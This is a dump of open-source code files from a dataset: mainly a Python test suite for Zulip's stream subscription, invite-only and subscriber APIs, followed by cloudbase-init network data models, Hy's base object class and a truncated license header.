def test_successful_subscriptions_list(self):
"""
Calling /api/v1/users/me/subscriptions should successfully return your subscriptions.
"""
email = self.test_email
result = self.client.get("/api/v1/users/me/subscriptions", **self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("subscriptions", json)
for stream in json['subscriptions']:
self.assertIsInstance(stream['name'], basestring)
self.assertIsInstance(stream['color'], basestring)
self.assertIsInstance(stream['invite_only'], bool)
# check that the stream name corresponds to an actual stream
try:
Stream.objects.get(name__iexact=stream['name'], realm=self.realm)
except Stream.DoesNotExist:
self.fail("stream does not exist")
list_streams = [stream['name'] for stream in json["subscriptions"]]
# also check that this matches the list of your subscriptions
self.assertItemsEqual(list_streams, self.streams)
def helper_check_subs_before_and_after_add(self, subscriptions, other_params,
subscribed, already_subscribed,
email, new_subs, invite_only=False):
"""
Check result of adding subscriptions.
You can add subscriptions for yourself or possibly many
principals, which is why e-mails map to subscriptions in the
result.
The result json is of the form
{"msg": "",
"result": "success",
"already_subscribed": {"iago@zulip.com": ["Venice", "Verona"]},
"subscribed": {"iago@zulip.com": ["Venice8"]}}
"""
result = self.common_subscribe_to_streams(self.test_email, subscriptions,
other_params, invite_only=invite_only)
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertItemsEqual(subscribed, json["subscribed"][email])
self.assertItemsEqual(already_subscribed, json["already_subscribed"][email])
new_streams = self.get_streams(email)
self.assertItemsEqual(new_streams, new_subs)
def test_successful_subscriptions_add(self):
"""
Calling /json/subscriptions/add should successfully add streams, and
should determine which are new subscriptions vs which were already
subscribed. We randomly generate stream names to add, because it
doesn't matter whether the stream already exists.
"""
self.assertNotEqual(len(self.streams), 0) # necessary for full test coverage
add_streams = self.make_random_stream_names(self.streams)
self.assertNotEqual(len(add_streams), 0) # necessary for full test coverage
events = []
with tornado_redirected_to_list(events):
self.helper_check_subs_before_and_after_add(self.streams + add_streams, {},
add_streams, self.streams, self.test_email, self.streams + add_streams)
self.assert_length(events, 4, True)
def test_successful_subscriptions_notifies_pm(self):
"""
Calling /json/subscriptions/add should notify when a new stream is created.
"""
invitee = "iago@zulip.com"
invitee_full_name = 'Iago'
current_stream = self.get_streams(invitee)[0]
invite_streams = self.make_random_stream_names(current_stream)[:1]
result = self.common_subscribe_to_streams(
invitee,
invite_streams,
extra_post_data={
'announce': 'true',
'principals': '["%s"]' % (self.user_profile.email,)
},
)
self.assert_json_success(result)
msg = Message.objects.latest('id')
self.assertEqual(msg.recipient.type, Recipient.PERSONAL)
self.assertEqual(msg.sender_id,
get_user_profile_by_email('notification-bot@zulip.com').id)
expected_msg = "Hi there! %s just created a new stream '%s'. " \
"!_stream_subscribe_button(%s)" % (invitee_full_name,
invite_streams[0],
invite_streams[0])
self.assertEqual(msg.content, expected_msg)
def test_successful_subscriptions_notifies_stream(self):
"""
Calling /json/subscriptions/add should notify when a new stream is created.
"""
invitee = "iago@zulip.com"
invitee_full_name = 'Iago'
current_stream = self.get_streams(invitee)[0]
invite_streams = self.make_random_stream_names(current_stream)[:1]
notifications_stream = Stream.objects.get(name=current_stream, realm=self.realm)
self.realm.notifications_stream = notifications_stream
self.realm.save()
# Delete the UserProfile from the cache so the realm change will be
# picked up
cache.cache_delete(cache.user_profile_by_email_cache_key(invitee))
result = self.common_subscribe_to_streams(
invitee,
invite_streams,
extra_post_data=dict(
announce='true',
principals='["%s"]' % (self.user_profile.email,)
),
)
self.assert_json_success(result)
msg = Message.objects.latest('id')
self.assertEqual(msg.recipient.type, Recipient.STREAM)
self.assertEqual(msg.sender_id,
get_user_profile_by_email('notification-bot@zulip.com').id)
expected_msg = "%s just created a new stream `%s`. " \
"!_stream_subscribe_button(%s)" % (invitee_full_name,
invite_streams[0],
invite_streams[0])
self.assertEqual(msg.content, expected_msg)
def test_successful_subscriptions_notifies_with_escaping(self):
"""
Calling /json/subscriptions/add should notify when a new stream is created.
"""
invitee = "iago@zulip.com"
invitee_full_name = 'Iago'
invite_streams = ['strange ) \\ test']
result = self.common_subscribe_to_streams(
invitee,
invite_streams,
extra_post_data={
'announce': 'true',
'principals': '["%s"]' % (self.user_profile.email,)
},
)
self.assert_json_success(result)
msg = Message.objects.latest('id')
self.assertEqual(msg.sender_id,
get_user_profile_by_email('notification-bot@zulip.com').id)
expected_msg = "Hi there! %s just created a new stream '%s'. " \
"!_stream_subscribe_button(strange \\) \\\\ test)" % (
invitee_full_name,
invite_streams[0])
self.assertEqual(msg.content, expected_msg)
def test_non_ascii_stream_subscription(self):
"""
Subscribing to a stream name with non-ASCII characters succeeds.
"""
self.helper_check_subs_before_and_after_add(self.streams + [u"hümbüǵ"], {},
[u"hümbüǵ"], self.streams, self.test_email, self.streams + [u"hümbüǵ"])
def test_subscriptions_add_too_long(self):
"""
Calling /json/subscriptions/add on a stream whose name is >60
characters should return a JSON error.
"""
# character limit is 60 characters
long_stream_name = "a" * 61
result = self.common_subscribe_to_streams(self.test_email, [long_stream_name])
self.assert_json_error(result,
"Stream name (%s) too long." % (long_stream_name,))
def test_user_settings_for_adding_streams(self):
with stub(UserProfile, 'can_create_streams', lambda self: True):
result = self.common_subscribe_to_streams(self.test_email, ['stream1'])
self.assert_json_success(result)
with stub(UserProfile, 'can_create_streams', lambda self: False):
result = self.common_subscribe_to_streams(self.test_email, ['stream1'])
self.assert_json_error(result, 'User cannot create streams.')
def test_subscriptions_add_invalid_stream(self):
"""
Calling /json/subscriptions/add on a stream whose name is invalid (as
defined by valid_stream_name in zerver/views.py) should return a JSON
error.
"""
# currently, the only invalid name is the empty string
invalid_stream_name = ""
result = self.common_subscribe_to_streams(self.test_email, [invalid_stream_name])
self.assert_json_error(result,
"Invalid stream name (%s)." % (invalid_stream_name,))
def assert_adding_subscriptions_for_principal(self, invitee, streams, invite_only=False):
"""
Calling /json/subscriptions/add on behalf of another principal (for
whom you have permission to add subscriptions) should successfully add
those subscriptions and send a message to the subscribee notifying
them.
"""
other_profile = get_user_profile_by_email(invitee)
current_streams = self.get_streams(invitee)
self.assertIsInstance(other_profile, UserProfile)
self.assertNotEqual(len(current_streams), 0) # necessary for full test coverage
self.assertNotEqual(len(streams), 0) # necessary for full test coverage
streams_to_sub = streams[:1] # just add one, to make the message easier to check
streams_to_sub.extend(current_streams)
self.helper_check_subs_before_and_after_add(streams_to_sub,
{"principals": ujson.dumps([invitee])}, streams[:1], current_streams,
invitee, streams_to_sub, invite_only=invite_only)
# verify that the user was sent a message informing them about the subscription
msg = Message.objects.latest('id')
self.assertEqual(msg.recipient.type, msg.recipient.PERSONAL)
self.assertEqual(msg.sender_id,
get_user_profile_by_email("notification-bot@zulip.com").id)
expected_msg = ("Hi there! We thought you'd like to know that %s just "
"subscribed you to the %sstream [%s](#narrow/stream/%s)."
% (self.user_profile.full_name,
'**invite-only** ' if invite_only else '',
streams[0], urllib.quote(streams[0].encode('utf-8'))))
if not Stream.objects.get(name=streams[0]).invite_only:
expected_msg += ("\nYou can see historical content on a "
"non-invite-only stream by narrowing to it.")
self.assertEqual(msg.content, expected_msg)
recipients = get_display_recipient(msg.recipient)
self.assertEqual(len(recipients), 1)
self.assertEqual(recipients[0]['email'], invitee)
def test_multi_user_subscription(self):
email1 = 'cordelia@zulip.com'
email2 = 'iago@zulip.com'
realm = Realm.objects.get(domain="zulip.com")
streams_to_sub = ['multi_user_stream']
events = []
with tornado_redirected_to_list(events):
with queries_captured() as queries:
self.common_subscribe_to_streams(
self.test_email,
streams_to_sub,
dict(principals=ujson.dumps([email1, email2])),
)
self.assert_length(queries, 43)
self.assert_length(events, 6, exact=True)
for ev in filter(lambda x: x['event']['type'] not in ('message', 'stream'), events):
self.assertEqual(ev['event']['op'], 'add')
self.assertEqual(
set(ev['event']['subscriptions'][0]['subscribers']),
set([email1, email2])
)
stream = get_stream('multi_user_stream', realm)
self.assertEqual(stream.num_subscribers(), 2)
# Now add ourselves
events = []
with tornado_redirected_to_list(events):
with queries_captured() as queries:
self.common_subscribe_to_streams(
self.test_email,
streams_to_sub,
dict(principals=ujson.dumps([self.test_email])),
)
self.assert_length(queries, 8)
self.assert_length(events, 2, True)
add_event, add_peer_event = events
self.assertEqual(add_event['event']['type'], 'subscription')
self.assertEqual(add_event['event']['op'], 'add')
self.assertEqual(add_event['users'], [get_user_profile_by_email(self.test_email).id])
self.assertEqual(
set(add_event['event']['subscriptions'][0]['subscribers']),
set([email1, email2, self.test_email])
)
self.assertEqual(len(add_peer_event['users']), 2)
self.assertEqual(add_peer_event['event']['type'], 'subscription')
self.assertEqual(add_peer_event['event']['op'], 'peer_add')
self.assertEqual(add_peer_event['event']['user_email'], self.test_email)
stream = get_stream('multi_user_stream', realm)
self.assertEqual(stream.num_subscribers(), 3)
# Finally, add othello, exercising the do_add_subscription() code path.
events = []
email3 = 'othello@zulip.com'
user_profile = get_user_profile_by_email(email3)
stream = get_stream('multi_user_stream', realm)
with tornado_redirected_to_list(events):
do_add_subscription(user_profile, stream)
self.assert_length(events, 2, True)
add_event, add_peer_event = events
self.assertEqual(add_event['event']['type'], 'subscription')
self.assertEqual(add_event['event']['op'], 'add')
self.assertEqual(add_event['users'], [get_user_profile_by_email(email3).id])
self.assertEqual(
set(add_event['event']['subscriptions'][0]['subscribers']),
set([email1, email2, email3, self.test_email])
)
self.assertEqual(len(add_peer_event['users']), 3)
self.assertEqual(add_peer_event['event']['type'], 'subscription')
self.assertEqual(add_peer_event['event']['op'], 'peer_add')
self.assertEqual(add_peer_event['event']['user_email'], email3)
def test_bulk_subscribe_MIT(self):
realm = Realm.objects.get(domain="mit.edu")
streams = ["stream_%s" % i for i in xrange(40)]
for stream in streams:
create_stream_if_needed(realm, stream)
events = []
with tornado_redirected_to_list(events):
with queries_captured() as queries:
self.common_subscribe_to_streams(
'starnine@mit.edu',
streams,
dict(principals=ujson.dumps(['starnine@mit.edu'])),
)
# Make sure MIT does not get any tornado subscription events
self.assert_length(events, 0, True)
self.assert_length(queries, 7)
def test_bulk_subscribe_many(self):
# Create a whole bunch of streams
realm = Realm.objects.get(domain="zulip.com")
streams = ["stream_%s" % i for i in xrange(20)]
for stream in streams:
create_stream_if_needed(realm, stream)
with queries_captured() as queries:
self.common_subscribe_to_streams(
self.test_email,
streams,
dict(principals=ujson.dumps([self.test_email])),
)
# Make sure we don't make O(streams) queries
self.assert_length(queries, 9)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_subscriptions_add_for_principal(self):
"""
You can subscribe other people to streams.
"""
invitee = "iago@zulip.com"
current_streams = self.get_streams(invitee)
invite_streams = self.make_random_stream_names(current_streams)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_subscriptions_add_for_principal_invite_only(self):
"""
You can subscribe other people to invite only streams.
"""
invitee = "iago@zulip.com"
current_streams = self.get_streams(invitee)
invite_streams = self.make_random_stream_names(current_streams)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams,
invite_only=True)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_non_ascii_subscription_for_principal(self):
"""
You can subscribe other people to streams even if they containing
non-ASCII characters.
"""
self.assert_adding_subscriptions_for_principal("iago@zulip.com", [u"hümbüǵ"])
def test_subscription_add_invalid_principal(self):
"""
Calling subscribe on behalf of a principal that does not exist
should return a JSON error.
"""
invalid_principal = "rosencrantz-and-guildenstern@zulip.com"
# verify that invalid_principal actually doesn't exist
with self.assertRaises(UserProfile.DoesNotExist):
get_user_profile_by_email(invalid_principal)
result = self.common_subscribe_to_streams(self.test_email, self.streams,
{"principals": ujson.dumps([invalid_principal])})
self.assert_json_error(result, "User not authorized to execute queries on behalf of '%s'"
% (invalid_principal,))
def test_subscription_add_principal_other_realm(self):
"""
Calling subscribe on behalf of a principal in another realm
should return a JSON error.
"""
principal = "starnine@mit.edu"
profile = get_user_profile_by_email(principal)
# verify that principal exists (thus, the reason for the error is the cross-realming)
self.assertIsInstance(profile, UserProfile)
result = self.common_subscribe_to_streams(self.test_email, self.streams,
{"principals": ujson.dumps([principal])})
self.assert_json_error(result, "User not authorized to execute queries on behalf of '%s'"
% (principal,))
def helper_check_subs_before_and_after_remove(self, subscriptions, json_dict,
email, new_subs):
"""
Check result of removing subscriptions.
Unlike adding subscriptions, you can only remove subscriptions
for yourself, so the result format is different.
{"msg": "",
"removed": ["Denmark", "Scotland", "Verona"],
"not_subscribed": ["Rome"], "result": "success"}
"""
result = self.client.post("/json/subscriptions/remove",
{"subscriptions": ujson.dumps(subscriptions)})
self.assert_json_success(result)
json = ujson.loads(result.content)
for key, val in json_dict.iteritems():
self.assertItemsEqual(val, json[key]) # we don't care about the order of the items
new_streams = self.get_streams(email)
self.assertItemsEqual(new_streams, new_subs)
def test_successful_subscriptions_remove(self):
"""
Calling /json/subscriptions/remove should successfully remove streams,
and should determine which were removed vs which weren't subscribed to.
We cannot randomly generate stream names because the remove code
verifies whether streams exist.
"""
if len(self.streams) < 2:
self.fail() # necesssary for full test coverage
streams_to_remove = self.streams[1:]
not_subbed = []
for stream in Stream.objects.all():
if not stream.name in self.streams:
not_subbed.append(stream.name)
random.shuffle(not_subbed)
self.assertNotEqual(len(not_subbed), 0) # necessary for full test coverage
try_to_remove = not_subbed[:3] # attempt to remove up to 3 streams not already subbed to
streams_to_remove.extend(try_to_remove)
self.helper_check_subs_before_and_after_remove(streams_to_remove,
{"removed": self.streams[1:], "not_subscribed": try_to_remove},
self.test_email, [self.streams[0]])
def test_subscriptions_remove_fake_stream(self):
"""
Calling /json/subscriptions/remove on a stream that doesn't exist
should return a JSON error.
"""
random_streams = self.make_random_stream_names(self.streams)
self.assertNotEqual(len(random_streams), 0) # necessary for full test coverage
streams_to_remove = random_streams[:1] # pick only one fake stream, to make checking the error message easy
result = self.client.post("/json/subscriptions/remove",
{"subscriptions": ujson.dumps(streams_to_remove)})
self.assert_json_error(result, "Stream(s) (%s) do not exist" % (random_streams[0],))
def helper_subscriptions_exists(self, stream, exists, subscribed):
"""
A helper function that calls /json/subscriptions/exists on a stream and
verifies that the returned JSON dictionary has the exists and
subscribed values passed in as parameters. (If subscribed should not be
present, pass in None.)
"""
result = self.client.post("/json/subscriptions/exists",
{"stream": stream})
json = ujson.loads(result.content)
self.assertIn("exists", json)
self.assertEqual(json["exists"], exists)
if exists:
self.assert_json_success(result)
else:
self.assertEquals(result.status_code, 404)
if not subscribed is None:
self.assertIn("subscribed", json)
self.assertEqual(json["subscribed"], subscribed)
def test_successful_subscriptions_exists_subbed(self):
"""
Calling /json/subscriptions/exist on a stream to which you are subbed
should return that it exists and that you are subbed.
"""
self.assertNotEqual(len(self.streams), 0) # necessary for full test coverage
self.helper_subscriptions_exists(self.streams[0], True, True)
def test_successful_subscriptions_exists_not_subbed(self):
"""
Calling /json/subscriptions/exist on a stream to which you are not
subbed should return that it exists and that you are not subbed.
"""
all_stream_names = [stream.name for stream in Stream.objects.filter(realm=self.realm)]
streams_not_subbed = list(set(all_stream_names) - set(self.streams))
self.assertNotEqual(len(streams_not_subbed), 0) # necessary for full test coverage
self.helper_subscriptions_exists(streams_not_subbed[0], True, False)
def test_subscriptions_does_not_exist(self):
"""
Calling /json/subscriptions/exist on a stream that doesn't exist should
return that it doesn't exist.
"""
random_streams = self.make_random_stream_names(self.streams)
self.assertNotEqual(len(random_streams), 0) # necessary for full test coverage
self.helper_subscriptions_exists(random_streams[0], False, None)
def test_subscriptions_exist_invalid_name(self):
"""
Calling /json/subscriptions/exist on a stream whose name is invalid (as
defined by valid_stream_name in zerver/views.py) should return a JSON
error.
"""
# currently, the only invalid stream name is the empty string
invalid_stream_name = ""
result = self.client.post("/json/subscriptions/exists",
{"stream": invalid_stream_name})
self.assert_json_error(result, "Invalid characters in stream name")
def get_subscription(self, user_profile, stream_name):
stream = Stream.objects.get(realm=self.realm, name=stream_name)
return Subscription.objects.get(
user_profile=user_profile,
recipient__type=Recipient.STREAM,
recipient__type_id=stream.id,
)
def test_subscriptions_add_notification_default_true(self):
"""
When creating a subscription, the desktop and audible notification
settings for that stream are derived from the global notification
settings.
"""
invitee = "iago@zulip.com"
user_profile = get_user_profile_by_email(invitee)
user_profile.enable_stream_desktop_notifications = True
user_profile.enable_stream_sounds = True
user_profile.save()
current_stream = self.get_streams(invitee)[0]
invite_streams = self.make_random_stream_names(current_stream)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams)
subscription = self.get_subscription(user_profile, invite_streams[0])
self.assertTrue(subscription.desktop_notifications)
self.assertTrue(subscription.audible_notifications)
def test_subscriptions_add_notification_default_false(self):
"""
When creating a subscription, the desktop and audible notification
settings for that stream are derived from the global notification
settings.
"""
invitee = "iago@zulip.com"
user_profile = get_user_profile_by_email(invitee)
user_profile.enable_stream_desktop_notifications = False
user_profile.enable_stream_sounds = False
user_profile.save()
current_stream = self.get_streams(invitee)[0]
invite_streams = self.make_random_stream_names(current_stream)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams)
subscription = self.get_subscription(user_profile, invite_streams[0])
self.assertFalse(subscription.desktop_notifications)
self.assertFalse(subscription.audible_notifications)
class GetPublicStreamsTest(AuthedTestCase):
def test_public_streams(self):
"""
Ensure that get_public_streams successfully returns a list of streams
"""
email = 'hamlet@zulip.com'
self.login(email)
result = self.client.post("/json/get_public_streams")
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("streams", json)
self.assertIsInstance(json["streams"], list)
def test_public_streams_api(self):
"""
Ensure that get_public_streams successfully returns a list of streams
"""
email = 'hamlet@zulip.com'
self.login(email)
# Check it correctly lists the user's subs with include_public=false
result = self.client.get("/api/v1/streams?include_public=false", **self.api_auth(email))
result2 = self.client.get("/api/v1/users/me/subscriptions", **self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("streams", json)
self.assertIsInstance(json["streams"], list)
self.assert_json_success(result2)
json2 = ujson.loads(result2.content)
self.assertEqual(sorted([s["name"] for s in json["streams"]]),
sorted([s["name"] for s in json2["subscriptions"]]))
# Check it correctly lists all public streams with include_subscribed=false
result = self.client.get("/api/v1/streams?include_public=true&include_subscribed=false",
**self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
all_streams = [stream.name for stream in
Stream.objects.filter(realm=get_user_profile_by_email(email).realm)]
self.assertEqual(sorted(s["name"] for s in json["streams"]),
sorted(all_streams))
# Check non-superuser can't use include_all_active
result = self.client.get("/api/v1/streams?include_all_active=true",
**self.api_auth(email))
self.assertEqual(result.status_code, 400)
class InviteOnlyStreamTest(AuthedTestCase):
def test_must_be_subbed_to_send(self):
"""
If you try to send a message to an invite-only stream to which
you aren't subscribed, you'll get a 400.
"""
self.login("hamlet@zulip.com")
# Create Saxony as an invite-only stream.
self.assert_json_success(
self.common_subscribe_to_streams("hamlet@zulip.com", ["Saxony"],
invite_only=True))
email = "cordelia@zulip.com"
with self.assertRaises(JsonableError):
self.send_message(email, "Saxony", Recipient.STREAM)
def test_list_respects_invite_only_bit(self):
"""
Make sure that /api/v1/users/me/subscriptions properly returns
the invite-only bit for streams that are invite-only
"""
email = 'hamlet@zulip.com'
self.login(email)
result1 = self.common_subscribe_to_streams(email, ["Saxony"], invite_only=True)
self.assert_json_success(result1)
result2 = self.common_subscribe_to_streams(email, ["Normandy"], invite_only=False)
self.assert_json_success(result2)
result = self.client.get("/api/v1/users/me/subscriptions", **self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("subscriptions", json)
for sub in json["subscriptions"]:
if sub['name'] == "Normandy":
self.assertEqual(sub['invite_only'], False, "Normandy was mistakenly marked invite-only")
if sub['name'] == "Saxony":
self.assertEqual(sub['invite_only'], True, "Saxony was not properly marked invite-only")
@slow(0.15, "lots of queries")
def test_inviteonly(self):
# Creating an invite-only stream is allowed
email = 'hamlet@zulip.com'
stream_name = "Saxony"
result = self.common_subscribe_to_streams(email, [stream_name], invite_only=True)
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertEqual(json["subscribed"], {email: [stream_name]})
self.assertEqual(json["already_subscribed"], {})
# Subscribing oneself to an invite-only stream is not allowed
email = "othello@zulip.com"
self.login(email)
result = self.common_subscribe_to_streams(email, [stream_name])
self.assert_json_error(result, 'Unable to access stream (Saxony).')
# authorization_errors_fatal=False works
email = "othello@zulip.com"
self.login(email)
result = self.common_subscribe_to_streams(email, [stream_name],
extra_post_data={'authorization_errors_fatal': ujson.dumps(False)})
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertEqual(json["unauthorized"], [stream_name])
self.assertEqual(json["subscribed"], {})
self.assertEqual(json["already_subscribed"], {})
# Inviting another user to an invite-only stream is allowed
email = 'hamlet@zulip.com'
self.login(email)
result = self.common_subscribe_to_streams(
email, [stream_name],
extra_post_data={'principals': ujson.dumps(["othello@zulip.com"])})
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertEqual(json["subscribed"], {"othello@zulip.com": [stream_name]})
self.assertEqual(json["already_subscribed"], {})
# Make sure both users are subscribed to this stream
result = self.client.get("/api/v1/streams/%s/members" % (stream_name,),
**self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertTrue('othello@zulip.com' in json['subscribers'])
self.assertTrue('hamlet@zulip.com' in json['subscribers'])
class GetSubscribersTest(AuthedTestCase):
def setUp(self):
self.email = "hamlet@zulip.com"
self.user_profile = get_user_profile_by_email(self.email)
self.login(self.email)
def check_well_formed_result(self, result, stream_name, domain):
"""
A successful call to get_subscribers returns the list of subscribers in
the form:
{"msg": "",
"result": "success",
"subscribers": ["hamlet@zulip.com", "prospero@zulip.com"]}
"""
self.assertIn("subscribers", result)
self.assertIsInstance(result["subscribers"], list)
true_subscribers = [user_profile.email for user_profile in self.users_subscribed_to_stream(
stream_name, domain)]
self.assertItemsEqual(result["subscribers"], true_subscribers)
def make_subscriber_request(self, stream_name, email=None):
if email is None:
email = self.email
return self.client.get("/api/v1/streams/%s/members" % (stream_name,),
**self.api_auth(email))
def make_successful_subscriber_request(self, stream_name):
result = self.make_subscriber_request(stream_name)
self.assert_json_success(result)
self.check_well_formed_result(ujson.loads(result.content),
stream_name, self.user_profile.realm.domain)
def test_subscriber(self):
"""
get_subscribers returns the list of subscribers.
"""
stream_name = gather_subscriptions(self.user_profile)[0][0]['name']
self.make_successful_subscriber_request(stream_name)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_gather_subscriptions(self):
"""
gather_subscriptions returns correct results with only 3 queries
"""
realm = Realm.objects.get(domain="zulip.com")
streams = ["stream_%s" % i for i in xrange(10)]
for stream in streams:
create_stream_if_needed(realm, stream)
users_to_subscribe = [self.email, "othello@zulip.com", "cordelia@zulip.com"]
ret = self.common_subscribe_to_streams(
self.email,
streams,
dict(principals=ujson.dumps(users_to_subscribe)))
self.assert_json_success(ret)
ret = self.common_subscribe_to_streams(
self.email,
["stream_invite_only_1"],
dict(principals=ujson.dumps(users_to_subscribe)),
invite_only=True)
self.assert_json_success(ret)
with queries_captured() as queries:
subscriptions = gather_subscriptions(self.user_profile)
self.assertTrue(len(subscriptions[0]) >= 11)
for sub in subscriptions[0]:
if not sub["name"].startswith("stream_"):
continue
self.assertTrue(len(sub["subscribers"]) == len(users_to_subscribe))
self.assert_length(queries, 4, exact=True)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_gather_subscriptions_mit(self):
"""
gather_subscriptions returns correct results with only 3 queries
"""
# Subscribe only ourself because invites are disabled on mit.edu
users_to_subscribe = ["starnine@mit.edu", "espuser@mit.edu"]
for email in users_to_subscribe:
self.subscribe_to_stream(email, "mit_stream")
ret = self.common_subscribe_to_streams(
"starnine@mit.edu",
["mit_invite_only"],
dict(principals=ujson.dumps(users_to_subscribe)),
invite_only=True)
self.assert_json_success(ret)
with queries_captured() as queries:
subscriptions = gather_subscriptions(get_user_profile_by_email("starnine@mit.edu"))
self.assertTrue(len(subscriptions[0]) >= 2)
for sub in subscriptions[0]:
if not sub["name"].startswith("mit_"):
continue
if sub["name"] == "mit_invite_only":
self.assertTrue(len(sub["subscribers"]) == len(users_to_subscribe))
else:
self.assertTrue(len(sub["subscribers"]) == 0)
self.assert_length(queries, 4, exact=True)
def test_nonsubscriber(self):
"""
Even a non-subscriber to a public stream can query a stream's membership
with get_subscribers.
"""
# Create a stream for which Hamlet is the only subscriber.
stream_name = "Saxony"
self.common_subscribe_to_streams(self.email, [stream_name])
other_email = "othello@zulip.com"
# Fetch the subscriber list as a non-member.
self.login(other_email)
self.make_successful_subscriber_request(stream_name)
def test_subscriber_private_stream(self):
"""
A subscriber to a private stream can query that stream's membership.
"""
stream_name = "Saxony"
self.common_subscribe_to_streams(self.email, [stream_name],
invite_only=True)
self.make_successful_subscriber_request(stream_name)
def test_nonsubscriber_private_stream(self):
"""
A non-subscriber to a private stream can't query that stream's membership.
"""
# Create a private stream for which Hamlet is the only subscriber.
stream_name = "NewStream"
self.common_subscribe_to_streams(self.email, [stream_name],
invite_only=True)
other_email = "othello@zulip.com"
# Try to fetch the subscriber list as a non-member.
result = self.make_subscriber_request(stream_name, email=other_email)
self.assert_json_error(result,
"Unable to retrieve subscribers for invite-only stream")
| apache-2.0 |
stackforge/cloudbase-init | cloudbaseinit/models/network.py | 1 | 2857 | # Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
LINK_TYPE_PHYSICAL = "physical"
LINK_TYPE_BOND = "bond"
LINK_TYPE_VLAN = "vlan"
# Based on: https://www.kernel.org/doc/Documentation/networking/bonding.txts
BOND_TYPE_8023AD = "802.3ad"
BOND_TYPE_BALANCE_RR = "balance-rr"
BOND_TYPE_ACTIVE_BACKUP = "active-backup"
BOND_TYPE_BALANCE_XOR = "balance-xor"
BOND_TYPE_BROADCAST = "broadcast"
BOND_TYPE_BALANCE_TLB = "balance-tlb"
BOND_TYPE_BALANCE_ALB = "balance-alb"
AVAILABLE_BOND_TYPES = [
BOND_TYPE_8023AD,
BOND_TYPE_BALANCE_RR,
BOND_TYPE_ACTIVE_BACKUP,
BOND_TYPE_BALANCE_XOR,
BOND_TYPE_BROADCAST,
BOND_TYPE_BALANCE_TLB,
BOND_TYPE_BALANCE_ALB,
]
BOND_LB_ALGO_L2 = "layer2"
BOND_LB_ALGO_L2_L3 = "layer2+3"
BOND_LB_ALGO_L3_L4 = "layer3+4"
BOND_LB_ENCAP_L2_L3 = "encap2+3"
BOND_LB_ENCAP_L3_L4 = "encap3+4"
AVAILABLE_BOND_LB_ALGORITHMS = [
BOND_LB_ALGO_L2,
BOND_LB_ALGO_L2_L3,
BOND_LB_ALGO_L3_L4,
BOND_LB_ENCAP_L2_L3,
BOND_LB_ENCAP_L3_L4,
]
BOND_LACP_RATE_SLOW = "slow"
BOND_LACP_RATE_FAST = "fast"
AVAILABLE_BOND_LACP_RATES = [
BOND_LACP_RATE_SLOW,
BOND_LACP_RATE_FAST
]
NetworkDetails = collections.namedtuple(
"NetworkDetails",
[
"name",
"mac",
"address",
"address6",
"netmask",
"netmask6",
"broadcast",
"gateway",
"gateway6",
"dnsnameservers",
]
)
NetworkDetailsV2 = collections.namedtuple(
"NetworkDetailsV2",
[
"links",
"networks",
"services"
]
)
Link = collections.namedtuple(
"Link",
[
"id",
"name",
"type",
"enabled",
"mac_address",
"mtu",
"bond",
"vlan_link",
"vlan_id"
]
)
Bond = collections.namedtuple(
"Bond",
[
"members",
"type",
"lb_algorithm",
"lacp_rate"
]
)
Network = collections.namedtuple(
"Network",
[
"link",
"address_cidr",
"dns_nameservers",
"routes",
]
)
Route = collections.namedtuple(
"Route",
[
"network_cidr",
"gateway"
]
)
NameServerService = collections.namedtuple(
"NameServerService",
[
"addresses",
"search"
]
)
| apache-2.0 |
larme/hy | hy/models/__init__.py | 7 | 1687 | # Copyright (c) 2013 Paul Tagliamonte <paultag@debian.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
class HyObject(object):
"""
Generic Hy Object model. This is helpful to inject things into all the
Hy lexing Objects at once.
"""
def replace(self, other):
if isinstance(other, HyObject):
for attr in ["start_line", "end_line",
"start_column", "end_column"]:
if not hasattr(self, attr) and hasattr(other, attr):
setattr(self, attr, getattr(other, attr))
else:
raise TypeError("Can't replace a non Hy object with a Hy object")
return self
| mit |
mrcslws/nupic.research | tests/unit/frameworks/pytorch/le_sparse_net_test.py | 3 | 3282 | # Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
